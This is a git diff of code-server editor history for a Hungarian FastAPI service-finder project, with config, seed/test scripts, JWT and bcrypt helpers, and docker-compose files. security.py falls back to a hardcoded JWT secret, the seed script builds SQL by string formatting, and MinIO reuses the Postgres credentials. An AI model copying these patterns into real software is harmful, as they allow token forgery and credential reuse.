postgresql+asyncpg://user:pass@db:5432/dbname + + # --- Storage (MinIO) --- + MINIO_ENDPOINT: str # e.g., minio:9000 + MINIO_ACCESS_KEY: str + MINIO_SECRET_KEY: str + MINIO_BUCKET_NAME: str = "fleet-data" + + # --- Cache (Redis) --- + REDIS_URL: str = "redis://redis:6379/0" + + # Pydantic V2 Config + model_config = SettingsConfigDict( + env_file=".env", + env_file_encoding="utf-8", + case_sensitive=True, + extra="ignore" # Ignore extra env vars (like Docker internal vars) + ) + +settings = Settings() \ No newline at end of file diff --git a/code-server-config/data/User/History/-5e83fa91/entries.json b/code-server-config/data/User/History/-5e83fa91/entries.json new file mode 100755 index 0000000..2c1c44c --- /dev/null +++ b/code-server-config/data/User/History/-5e83fa91/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/core/config.py","entries":[{"id":"4Cft.py","timestamp":1769025385175},{"id":"5GlT.py","timestamp":1769027431998}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-638902d7/2Pxf.py b/code-server-config/data/User/History/-638902d7/2Pxf.py new file mode 100755 index 0000000..303f6f7 --- /dev/null +++ b/code-server-config/data/User/History/-638902d7/2Pxf.py @@ -0,0 +1,114 @@ +import asyncio +import sys +import os + +# Hozzáadjuk az app könyvtárat az útvonalhoz, hogy működjenek az importok +sys.path.append(os.path.join(os.path.dirname(__file__), '..')) + +from app.core.database import SessionLocal # FIGYELEM: Itt a régi vagy új helytől függően ellenőrizd! +# Ha a SessionLocal a db/session.py-ben van: +# from app.db.session import SessionLocal + +from app.models.user import User +from app.models.social import ServiceProvider, Competition, ModerationStatus +from app.services.social_service import vote_for_provider +from sqlalchemy import text +from datetime import datetime, timedelta + +async def run_simulation(): + async with SessionLocal() as db: + print("--- 1. TAKARÍTÁS (Előző tesztadatok törlése) ---") + # Kaszkádolt törlés a data sémában + await db.execute(text("TRUNCATE TABLE data.user_scores, data.votes, data.service_providers, data.competitions, data.users RESTART IDENTITY CASCADE")) + await db.commit() + + print("\n--- 2. SZEREPLŐK LÉTREHOZÁSA ---") + # Admin + admin = User(email="admin@test.com", password_hash="hash", full_name="Admin", is_superuser=True) + # Jófiú (aki valós boltokat tölt fel) + good_user = User(email="good@test.com", password_hash="hash", full_name="Good Guy", reputation_score=5) + # Rosszfiú (aki fake boltokat tölt fel) + bad_user = User(email="bad@test.com", password_hash="hash", full_name="Spammer", reputation_score=-8) # Közel a banhoz + # Szavazóközönség + voter1 = User(email="voter1@test.com", password_hash="hash", full_name="Voter 1") + voter2 = User(email="voter2@test.com", password_hash="hash", full_name="Voter 2") + voter3 = User(email="voter3@test.com", password_hash="hash", full_name="Voter 3") + voter4 = User(email="voter4@test.com", password_hash="hash", full_name="Voter 4") + voter5 = User(email="voter5@test.com", password_hash="hash", full_name="Voter 5") + + db.add_all([admin, good_user, bad_user, voter1, voter2, voter3, voter4, voter5]) + await db.commit() + + # ID-k lekérése + for u in [good_user, bad_user, voter1, voter2, voter3, voter4, voter5]: + await db.refresh(u) + + print("\n--- 3. VERSENY INDÍTÁSA ---") + race = Competition( + name="Nagy Januári Verseny", + description="Töltsd fel a legtöbb boltot!", + start_date=datetime.utcnow() - timedelta(days=1), + end_date=datetime.utcnow() + timedelta(days=30), + is_active=True + ) + db.add(race) + await db.commit() + await db.refresh(race) + + print("\n--- 4. SZCENÁRIÓ A: A JÓ FELHASZNÁLÓ ---") + # Good Guy feltölt egy boltot + good_shop = ServiceProvider( + name="Korrekt Gumiszerviz", + address="Fő utca 1.", + added_by_user_id=good_user.id, + status=ModerationStatus.pending + ) + db.add(good_shop) + await db.commit() + await db.refresh(good_shop) + + # A tömeg megszavazza (Kell 5 pont az elfogadáshoz) + print(f"Szavazás a '{good_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, good_shop.id, 1) + await vote_for_provider(db, voter2.id, good_shop.id, 1) + await vote_for_provider(db, voter3.id, good_shop.id, 1) + await vote_for_provider(db, voter4.id, good_shop.id, 1) + await vote_for_provider(db, voter5.id, good_shop.id, 1) # Itt éri el az 5-öt! + + # Eredmény ellenőrzése + await db.refresh(good_user) + print(f"Good Guy Hírneve (Elvárt: 6): {good_user.reputation_score}") + # Pontszám ellenőrzése közvetlen SQL-el a biztonság kedvéért + points = await db.execute(text(f"SELECT points FROM data.user_scores WHERE user_id={good_user.id}")) + print(f"Good Guy Verseny Pontjai (Elvárt: 10): {points.scalar()}") + + print("\n--- 5. SZCENÁRIÓ B: A ROSSZ FELHASZNÁLÓ (AUTO-BAN TESZT) ---") + # Bad Guy feltölt egy fake boltot + fake_shop = ServiceProvider( + name="KAMU Bolt", + address="Nincs ilyen utca", + added_by_user_id=bad_user.id, + status=ModerationStatus.pending + ) + db.add(fake_shop) + await db.commit() + await db.refresh(fake_shop) + + # A tömeg leszavazza (Kell -3 az elutasításhoz) + print(f"Szavazás a '{fake_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, fake_shop.id, -1) + await vote_for_provider(db, voter2.id, fake_shop.id, -1) + await vote_for_provider(db, voter3.id, fake_shop.id, -1) # Itt éri el a -3-at! + + # Eredmény ellenőrzése + await db.refresh(bad_user) + print(f"Bad User Hírneve (Elvárt: -10): {bad_user.reputation_score}") + print(f"Bad User Aktív? (Elvárt: False/Banned): {bad_user.is_active}") + + if not bad_user.is_active: + print("✅ SIKER: A rendszer automatikusan kitiltotta a csalót!") + else: + print("❌ HIBA: A felhasználó még mindig aktív.") + +if __name__ == "__main__": + asyncio.run(run_simulation()) \ No newline at end of file diff --git a/code-server-config/data/User/History/-638902d7/6Sot.py b/code-server-config/data/User/History/-638902d7/6Sot.py new file mode 100755 index 0000000..b8a090f --- /dev/null +++ b/code-server-config/data/User/History/-638902d7/6Sot.py @@ -0,0 +1,114 @@ +import asyncio +import sys +import os + +# Hozzáadjuk az app könyvtárat az útvonalhoz, hogy működjenek az importok +sys.path.append(os.path.join(os.path.dirname(__file__), '..')) + +from app.db.session import SessionLocal # FIGYELEM: Itt a régi vagy új helytől függően ellenőrizd! +# Ha a SessionLocal a db/session.py-ben van: +# from app.db.session import SessionLocal + +from app.models.user import User +from app.models.social import ServiceProvider, Competition, ModerationStatus +from app.services.social_service import vote_for_provider +from sqlalchemy import text +from datetime import datetime, timedelta + +async def run_simulation(): + async with SessionLocal() as db: + print("--- 1. TAKARÍTÁS (Előző tesztadatok törlése) ---") + # Kaszkádolt törlés a data sémában + await db.execute(text("TRUNCATE TABLE data.user_scores, data.votes, data.service_providers, data.competitions, data.users RESTART IDENTITY CASCADE")) + await db.commit() + + print("\n--- 2. SZEREPLŐK LÉTREHOZÁSA ---") + # Admin + admin = User(email="admin@test.com", password_hash="hash", full_name="Admin", is_superuser=True) + # Jófiú (aki valós boltokat tölt fel) + good_user = User(email="good@test.com", password_hash="hash", full_name="Good Guy", reputation_score=5) + # Rosszfiú (aki fake boltokat tölt fel) + bad_user = User(email="bad@test.com", password_hash="hash", full_name="Spammer", reputation_score=-8) # Közel a banhoz + # Szavazóközönség + voter1 = User(email="voter1@test.com", password_hash="hash", full_name="Voter 1") + voter2 = User(email="voter2@test.com", password_hash="hash", full_name="Voter 2") + voter3 = User(email="voter3@test.com", password_hash="hash", full_name="Voter 3") + voter4 = User(email="voter4@test.com", password_hash="hash", full_name="Voter 4") + voter5 = User(email="voter5@test.com", password_hash="hash", full_name="Voter 5") + + db.add_all([admin, good_user, bad_user, voter1, voter2, voter3, voter4, voter5]) + await db.commit() + + # ID-k lekérése + for u in [good_user, bad_user, voter1, voter2, voter3, voter4, voter5]: + await db.refresh(u) + + print("\n--- 3. VERSENY INDÍTÁSA ---") + race = Competition( + name="Nagy Januári Verseny", + description="Töltsd fel a legtöbb boltot!", + start_date=datetime.utcnow() - timedelta(days=1), + end_date=datetime.utcnow() + timedelta(days=30), + is_active=True + ) + db.add(race) + await db.commit() + await db.refresh(race) + + print("\n--- 4. SZCENÁRIÓ A: A JÓ FELHASZNÁLÓ ---") + # Good Guy feltölt egy boltot + good_shop = ServiceProvider( + name="Korrekt Gumiszerviz", + address="Fő utca 1.", + added_by_user_id=good_user.id, + status=ModerationStatus.pending + ) + db.add(good_shop) + await db.commit() + await db.refresh(good_shop) + + # A tömeg megszavazza (Kell 5 pont az elfogadáshoz) + print(f"Szavazás a '{good_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, good_shop.id, 1) + await vote_for_provider(db, voter2.id, good_shop.id, 1) + await vote_for_provider(db, voter3.id, good_shop.id, 1) + await vote_for_provider(db, voter4.id, good_shop.id, 1) + await vote_for_provider(db, voter5.id, good_shop.id, 1) # Itt éri el az 5-öt! + + # Eredmény ellenőrzése + await db.refresh(good_user) + print(f"Good Guy Hírneve (Elvárt: 6): {good_user.reputation_score}") + # Pontszám ellenőrzése közvetlen SQL-el a biztonság kedvéért + points = await db.execute(text(f"SELECT points FROM data.user_scores WHERE user_id={good_user.id}")) + print(f"Good Guy Verseny Pontjai (Elvárt: 10): {points.scalar()}") + + print("\n--- 5. SZCENÁRIÓ B: A ROSSZ FELHASZNÁLÓ (AUTO-BAN TESZT) ---") + # Bad Guy feltölt egy fake boltot + fake_shop = ServiceProvider( + name="KAMU Bolt", + address="Nincs ilyen utca", + added_by_user_id=bad_user.id, + status=ModerationStatus.pending + ) + db.add(fake_shop) + await db.commit() + await db.refresh(fake_shop) + + # A tömeg leszavazza (Kell -3 az elutasításhoz) + print(f"Szavazás a '{fake_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, fake_shop.id, -1) + await vote_for_provider(db, voter2.id, fake_shop.id, -1) + await vote_for_provider(db, voter3.id, fake_shop.id, -1) # Itt éri el a -3-at! + + # Eredmény ellenőrzése + await db.refresh(bad_user) + print(f"Bad User Hírneve (Elvárt: -10): {bad_user.reputation_score}") + print(f"Bad User Aktív? (Elvárt: False/Banned): {bad_user.is_active}") + + if not bad_user.is_active: + print("✅ SIKER: A rendszer automatikusan kitiltotta a csalót!") + else: + print("❌ HIBA: A felhasználó még mindig aktív.") + +if __name__ == "__main__": + asyncio.run(run_simulation()) \ No newline at end of file diff --git a/code-server-config/data/User/History/-638902d7/YGCT.py b/code-server-config/data/User/History/-638902d7/YGCT.py new file mode 100755 index 0000000..c6e715b --- /dev/null +++ b/code-server-config/data/User/History/-638902d7/YGCT.py @@ -0,0 +1,118 @@ +import asyncio +import sys +import os + +# Útvonal beállítása +sys.path.append(os.path.join(os.path.dirname(__file__), '..')) + +# --- JAVÍTÁS 1: A Helyes Aszinkron Session Importálása --- +from app.db.session import AsyncSessionLocal +# --------------------------------------------------------- + +from app.models.user import User +from app.models.social import ServiceProvider, Competition, ModerationStatus +from app.services.social_service import vote_for_provider +from sqlalchemy import text +from datetime import datetime, timedelta + +async def run_simulation(): + # --- JAVÍTÁS 2: Itt is az AsyncSessionLocal-t használjuk --- + async with AsyncSessionLocal() as db: + # ----------------------------------------------------------- + print("--- 1. TAKARÍTÁS (Előző tesztadatok törlése) ---") + # Kaszkádolt törlés a data sémában + await db.execute(text("TRUNCATE TABLE data.user_scores, data.votes, data.service_providers, data.competitions, data.users RESTART IDENTITY CASCADE")) + await db.commit() + + print("\n--- 2. SZEREPLŐK LÉTREHOZÁSA ---") + # Admin + admin = User(email="admin@test.com", password_hash="hash", full_name="Admin", is_superuser=True) + # Jófiú (aki valós boltokat tölt fel) + good_user = User(email="good@test.com", password_hash="hash", full_name="Good Guy", reputation_score=5) + # Rosszfiú (aki fake boltokat tölt fel) + bad_user = User(email="bad@test.com", password_hash="hash", full_name="Spammer", reputation_score=-8) # Közel a banhoz + # Szavazóközönség + voter1 = User(email="voter1@test.com", password_hash="hash", full_name="Voter 1") + voter2 = User(email="voter2@test.com", password_hash="hash", full_name="Voter 2") + voter3 = User(email="voter3@test.com", password_hash="hash", full_name="Voter 3") + voter4 = User(email="voter4@test.com", password_hash="hash", full_name="Voter 4") + voter5 = User(email="voter5@test.com", password_hash="hash", full_name="Voter 5") + + db.add_all([admin, good_user, bad_user, voter1, voter2, voter3, voter4, voter5]) + await db.commit() + + # ID-k lekérése + for u in [good_user, bad_user, voter1, voter2, voter3, voter4, voter5]: + await db.refresh(u) + + print("\n--- 3. VERSENY INDÍTÁSA ---") + race = Competition( + name="Nagy Januári Verseny", + description="Töltsd fel a legtöbb boltot!", + start_date=datetime.utcnow() - timedelta(days=1), + end_date=datetime.utcnow() + timedelta(days=30), + is_active=True + ) + db.add(race) + await db.commit() + await db.refresh(race) + + print("\n--- 4. SZCENÁRIÓ A: A JÓ FELHASZNÁLÓ ---") + # Good Guy feltölt egy boltot + good_shop = ServiceProvider( + name="Korrekt Gumiszerviz", + address="Fő utca 1.", + added_by_user_id=good_user.id, + status=ModerationStatus.pending + ) + db.add(good_shop) + await db.commit() + await db.refresh(good_shop) + + # A tömeg megszavazza (Kell 5 pont az elfogadáshoz) + print(f"Szavazás a '{good_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, good_shop.id, 1) + await vote_for_provider(db, voter2.id, good_shop.id, 1) + await vote_for_provider(db, voter3.id, good_shop.id, 1) + await vote_for_provider(db, voter4.id, good_shop.id, 1) + await vote_for_provider(db, voter5.id, good_shop.id, 1) # Itt éri el az 5-öt! + + # Eredmény ellenőrzése + await db.refresh(good_user) + print(f"Good Guy Hírneve (Elvárt: 6): {good_user.reputation_score}") + + # Pontszám ellenőrzése + points = await db.execute(text(f"SELECT points FROM data.user_scores WHERE user_id={good_user.id}")) + scalar_points = points.scalar() + print(f"Good Guy Verseny Pontjai (Elvárt: 10): {scalar_points}") + + print("\n--- 5. SZCENÁRIÓ B: A ROSSZ FELHASZNÁLÓ (AUTO-BAN TESZT) ---") + # Bad Guy feltölt egy fake boltot + fake_shop = ServiceProvider( + name="KAMU Bolt", + address="Nincs ilyen utca", + added_by_user_id=bad_user.id, + status=ModerationStatus.pending + ) + db.add(fake_shop) + await db.commit() + await db.refresh(fake_shop) + + # A tömeg leszavazza (Kell -3 az elutasításhoz) + print(f"Szavazás a '{fake_shop.name}' boltra...") + await vote_for_provider(db, voter1.id, fake_shop.id, -1) + await vote_for_provider(db, voter2.id, fake_shop.id, -1) + await vote_for_provider(db, voter3.id, fake_shop.id, -1) # Itt éri el a -3-at! + + # Eredmény ellenőrzése + await db.refresh(bad_user) + print(f"Bad User Hírneve (Elvárt: -10): {bad_user.reputation_score}") + print(f"Bad User Aktív? (Elvárt: False/Banned): {bad_user.is_active}") + + if not bad_user.is_active: + print("✅ SIKER: A rendszer automatikusan kitiltotta a csalót!") + else: + print("❌ HIBA: A felhasználó még mindig aktív.") + +if __name__ == "__main__": + asyncio.run(run_simulation()) \ No newline at end of file diff --git a/code-server-config/data/User/History/-638902d7/entries.json b/code-server-config/data/User/History/-638902d7/entries.json new file mode 100755 index 0000000..7a474fe --- /dev/null +++ b/code-server-config/data/User/History/-638902d7/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/seed_data.py","entries":[{"id":"2Pxf.py","timestamp":1769033864915},{"id":"6Sot.py","timestamp":1769034106288},{"id":"YGCT.py","timestamp":1769034335646}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-6713540d/entries.json b/code-server-config/data/User/History/-6713540d/entries.json new file mode 100755 index 0000000..e4abfb7 --- /dev/null +++ b/code-server-config/data/User/History/-6713540d/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/requirements.txt","entries":[{"id":"xRtx.txt","timestamp":1769025945435}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-6713540d/xRtx.txt b/code-server-config/data/User/History/-6713540d/xRtx.txt new file mode 100755 index 0000000..0c5c800 --- /dev/null +++ b/code-server-config/data/User/History/-6713540d/xRtx.txt @@ -0,0 +1,8 @@ +fastapi +uvicorn[standard] +psycopg[binary] +python-jose[cryptography] +passlib[bcrypt] +pydantic +pydantic-settings +python-multipart diff --git a/code-server-config/data/User/History/-6f62bdcf/Krug.py b/code-server-config/data/User/History/-6f62bdcf/Krug.py new file mode 100755 index 0000000..68a7f14 --- /dev/null +++ b/code-server-config/data/User/History/-6f62bdcf/Krug.py @@ -0,0 +1,32 @@ +import os +from datetime import datetime, timedelta +from typing import Any, Union +from jose import jwt +from passlib.context import CryptContext + +# Jelszó titkosítás beállítása +pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto") + +# Környezeti változók (idővel menjenek a config.py-ba) +SECRET_KEY = os.getenv("SECRET_KEY", "09d25e094faa6ca2556c818166b7a9563b93f7099f6f0f4caa6cf63b88e8d3e7") +ALGORITHM = "HS256" + +def verify_password(plain_password: str, hashed_password: str) -> bool: + """Ellenőrzi, hogy a megadott jelszó egyezik-e a hash-elt változattal.""" + return pwd_context.verify(plain_password, hashed_password) + +def get_password_hash(password: str) -> str: + """Létrehozza a jelszó biztonságos hash-ét.""" + return pwd_context.hash(password) + +def create_access_token(data: dict, expires_delta: Union[timedelta, None] = None) -> str: + """Létrehoz egy JWT tokent.""" + to_encode = data.copy() + if expires_delta: + expire = datetime.utcnow() + expires_delta + else: + expire = datetime.utcnow() + timedelta(minutes=1440) # 1 nap alapértelmezett + + to_encode.update({"exp": expire}) + encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) + return encoded_jwt diff --git a/code-server-config/data/User/History/-6f62bdcf/entries.json b/code-server-config/data/User/History/-6f62bdcf/entries.json new file mode 100755 index 0000000..237602a --- /dev/null +++ b/code-server-config/data/User/History/-6f62bdcf/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/core/security.py","entries":[{"id":"Krug.py","timestamp":1769041965907},{"id":"gq3x.py","timestamp":1769042450084}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-6f62bdcf/gq3x.py b/code-server-config/data/User/History/-6f62bdcf/gq3x.py new file mode 100755 index 0000000..317e6dd --- /dev/null +++ b/code-server-config/data/User/History/-6f62bdcf/gq3x.py @@ -0,0 +1,36 @@ +import os +import bcrypt +from datetime import datetime, timedelta +from typing import Any, Union +from jose import jwt + +# Titkosítási beállítások +SECRET_KEY = os.getenv("SECRET_KEY", "09d25e094faa6ca2556c818166b7a9563b93f7099f6f0f4caa6cf63b88e8d3e7") +ALGORITHM = "HS256" + +def verify_password(plain_password: str, hashed_password: str) -> bool: + """Ellenőrzi a jelszót közvetlenül a bcrypt használatával.""" + # A bcrypt byte-okat vár, ezért konvertáljuk le + password_bytes = plain_password.encode('utf-8') + hashed_bytes = hashed_password.encode('utf-8') + return bcrypt.checkpw(password_bytes, hashed_bytes) + +def get_password_hash(password: str) -> str: + """Létrehozza a jelszó hash-ét közvetlenül a bcrypt használatával.""" + # Salt generálás és hash-elés + salt = bcrypt.gensalt() + password_bytes = password.encode('utf-8') + hashed = bcrypt.hashpw(password_bytes, salt) + return hashed.decode('utf-8') + +def create_access_token(data: dict, expires_delta: Union[timedelta, None] = None) -> str: + """JWT token generálása.""" + to_encode = data.copy() + if expires_delta: + expire = datetime.utcnow() + expires_delta + else: + expire = datetime.utcnow() + timedelta(minutes=1440) + + to_encode.update({"exp": expire}) + encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM) + return encoded_jwt \ No newline at end of file diff --git a/code-server-config/data/User/History/-706ef310/8tZ1.yml b/code-server-config/data/User/History/-706ef310/8tZ1.yml new file mode 100755 index 0000000..2ad1b0b --- /dev/null +++ b/code-server-config/data/User/History/-706ef310/8tZ1.yml @@ -0,0 +1,94 @@ +services: + # 1. ADATBÁZIS (NAS-ra mentett adatokkal) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + # A perzisztens adatbázis fájlok a NAS-ra kerülnek + - /mnt/nas/app_data/postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (NAS-on lévő kódbázissal) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + # A forráskódot a NAS-ról olvassa be + - /mnt/nas/git_vault/service_finder/backend:/app + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (Adminisztrációs felület) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + volumes: + # A pgAdmin beállításai is maradjanak meg a NAS-on + - /mnt/nas/app_data/pgadmin_data:/var/lib/pgadmin + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (A fájlok fizikai helye a NAS) + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + # Ez a legfontosabb: a képek és számlák a NAS-ra mennek + - /mnt/nas/app_data/minio_data:/data + ports: + - "9000:9000" + - "9001:9001" + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár) + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + # A Redis snapshot-ok a NAS-ra kerülnek + - /mnt/nas/app_data/redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +# Megjegyzés: A lenti volume-okat töröltük, mert "Bind Mount"-ra (direkt útvonalra) váltottunk \ No newline at end of file diff --git a/code-server-config/data/User/History/-706ef310/G0yH.yml b/code-server-config/data/User/History/-706ef310/G0yH.yml new file mode 100755 index 0000000..f9a6668 --- /dev/null +++ b/code-server-config/data/User/History/-706ef310/G0yH.yml @@ -0,0 +1,106 @@ +services: + # 1. ADATBÁZIS (NAS-ra mentett adatokkal) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + # A perzisztens adatbázis fájlok a NAS-ra kerülnek + - /mnt/nas/app_data/postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + healthcheck: + test: ["CMD-SHELL", "pg_isready -U ${POSTGRES_USER} -d ${POSTGRES_DB}"] + interval: 5s + timeout: 5s + retries: 5 + + # 2. BACKEND API (NAS-on lévő kódbázissal) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + # Ez biztosítja, hogy ha a NAS-on módosítasz egy fájlt, a szerveren futó app azonnal lássa + - /mnt/nas/git_vault/service_finder/backend:/app + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + # A belső hálózaton a gépnév 'postgres-db', a port pedig fixen 5432 + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:5432/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + # SendGrid API kulcs hozzáadása, hogy az email küldés is menjen + - SENDGRID_API_KEY=${SENDGRID_API_KEY} + depends_on: + postgres-db: + condition: service_healthy + minio: + condition: service_started + redis: + condition: service_started + networks: + - service_finder_net + + # 3. PGADMIN (Adminisztrációs felület) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + volumes: + # A pgAdmin beállításai is maradjanak meg a NAS-on + - /mnt/nas/app_data/pgadmin_data:/var/lib/pgadmin + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (A fájlok fizikai helye a NAS) + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + # Ez a legfontosabb: a képek és számlák a NAS-ra mennek + - /mnt/nas/app_data/minio_data:/data + ports: + - "9000:9000" + - "9001:9001" + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár) + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + # A Redis snapshot-ok a NAS-ra kerülnek + - /mnt/nas/app_data/redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +# Megjegyzés: A lenti volume-okat töröltük, mert "Bind Mount"-ra (direkt útvonalra) váltottunk \ No newline at end of file diff --git a/code-server-config/data/User/History/-706ef310/entries.json b/code-server-config/data/User/History/-706ef310/entries.json new file mode 100755 index 0000000..47bc755 --- /dev/null +++ b/code-server-config/data/User/History/-706ef310/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/docker-compose.yml","entries":[{"id":"8tZ1.yml","timestamp":1769114735873},{"id":"qmzx.yml","timestamp":1769115408928},{"id":"G0yH.yml","timestamp":1769116109979}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-706ef310/qmzx.yml b/code-server-config/data/User/History/-706ef310/qmzx.yml new file mode 100755 index 0000000..d3c0745 --- /dev/null +++ b/code-server-config/data/User/History/-706ef310/qmzx.yml @@ -0,0 +1,100 @@ +services: + # 1. ADATBÁZIS (NAS-ra mentett adatokkal) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + # A perzisztens adatbázis fájlok a NAS-ra kerülnek + - /mnt/nas/app_data/postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + healthcheck: + test: ["CMD-SHELL", "pg_isready -U ${POSTGRES_USER} -d ${POSTGRES_DB}"] + interval: 5s + timeout: 5s + retries: 5 + + # 2. BACKEND API (NAS-on lévő kódbázissal) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + # A forráskódot a NAS-ról olvassa be + - /mnt/nas/git_vault/service_finder/backend:/app + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (Adminisztrációs felület) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + volumes: + # A pgAdmin beállításai is maradjanak meg a NAS-on + - /mnt/nas/app_data/pgadmin_data:/var/lib/pgadmin + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (A fájlok fizikai helye a NAS) + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + # Ez a legfontosabb: a képek és számlák a NAS-ra mennek + - /mnt/nas/app_data/minio_data:/data + ports: + - "9000:9000" + - "9001:9001" + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár) + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + # A Redis snapshot-ok a NAS-ra kerülnek + - /mnt/nas/app_data/redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +# Megjegyzés: A lenti volume-okat töröltük, mert "Bind Mount"-ra (direkt útvonalra) váltottunk \ No newline at end of file diff --git a/code-server-config/data/User/History/-719dbe4/2C3o.json b/code-server-config/data/User/History/-719dbe4/2C3o.json new file mode 100755 index 0000000..b1ed5d4 --- /dev/null +++ b/code-server-config/data/User/History/-719dbe4/2C3o.json @@ -0,0 +1,3 @@ +{ + "keyboard.layout": "0000040E" +} \ No newline at end of file diff --git a/code-server-config/data/User/History/-719dbe4/entries.json b/code-server-config/data/User/History/-719dbe4/entries.json new file 